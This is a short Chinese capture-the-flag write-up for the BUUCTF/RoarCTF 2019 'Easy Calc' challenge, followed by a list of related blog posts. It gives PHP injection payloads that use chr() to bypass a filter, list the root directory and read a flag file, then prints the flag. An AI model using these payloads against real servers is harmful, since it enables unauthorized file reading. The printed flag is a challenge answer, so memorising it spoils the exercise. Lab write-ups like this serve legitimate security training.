BUUCTF---[RoarCTF 2019]Easy Calc1

1.题目描述

2.搜索网址是一个计算器,输入正常的运算,可以运算

3.查看源码,发现有一个calc.php

4.访问calc.php,代码提示用get方式传输num参数,但是过滤了\等等。

5.构造play load,发现了一个f1agg.

复制代码
num=print_r(scandir(chr(47)))

chr(47)是"/"的ASCII编码

scandir()是用来扫描文件目录

print_r是将扫描结果打印出来

6.尝试访问f1agg

复制代码
num=print_r(file_get_contents(chr(47).f1agg))

file_get_conctents()用来读取f1agg里面的内容,最后print_r将内容输出

7.

复制代码
flag{de45bb5f-1b75-4b33-99fb-904f876df79f} 
相关推荐
Bruce_Liuxiaowei2 小时前
常见高危端口风险分析与防护指南
网络·网络安全·端口·信息搜集
2501_916013743 小时前
iOS 多线程导致接口乱序?抓包还原 + 请求调度优化实战
websocket·网络协议·tcp/ip·http·网络安全·https·udp
头发那是一根不剩了4 小时前
双因子认证(2FA)是什么?从零设计一个安全的双因子登录接口
网络安全·系统设计·身份认证
浩浩测试一下5 小时前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构
Gappsong8747 小时前
【Linux学习】Linux安装并配置Redis
java·linux·运维·网络安全
Fortinet_CHINA8 小时前
工业网络安全新范式——从风险可见性到量化防御的进化
安全·web安全
Johny_Zhao10 小时前
Docker 一键安装部署 JumpServer 堡垒机
linux·网络安全·信息安全·云计算·shell·jumpserver·ldap·yum源·系统运维
网安小白的进阶之路10 小时前
A模块 系统与网络安全 第三门课 网络通信原理-3
网络·windows·安全·web安全·系统安全
HumanRisk10 小时前
HumanRisk-自动化安全意识与合规教育平台方案
网络·安全·web安全·网络安全意识教育
unable code11 小时前
攻防世界-Rerverse-game
网络安全·ctf·reverse